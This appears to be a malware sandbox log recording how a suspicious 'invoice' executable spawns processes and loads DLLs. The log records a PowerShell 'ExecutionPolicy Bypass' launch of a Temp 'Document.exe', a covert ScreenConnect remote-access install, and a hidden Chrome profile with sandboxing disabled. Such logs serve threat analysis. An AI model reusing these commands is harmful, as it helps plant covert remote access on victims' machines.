                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Document.exe "C:\Users\user\AppData\Local\Temp\Document.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi"
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F31D207096A70303A87FAA569F8958D C
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9C864324F3ACEEC3843B308126110901
                            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56F78CA946A322F1A8337330F29E556C E Global\MSI0000
                            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe" "RunRole" "94bdae91-aed5-45b2-b496-05a680474da1" "User"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: unknown unknown
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-pre-read-main-dll --field-trial-handle=2120,i,14894441107756567341,7342821476491626957,262144 --variations-seed-version=20231002-080120.576000 --mojo-platform-channel-handle=2256 /prefetch:3
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Program Files\7-Zip\7z.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: libcares-2.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: icu.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeSection loaded: msvcp290.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cryptnet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: cabinet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: devenum.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: devobj.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: msdmo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: propsys.dll
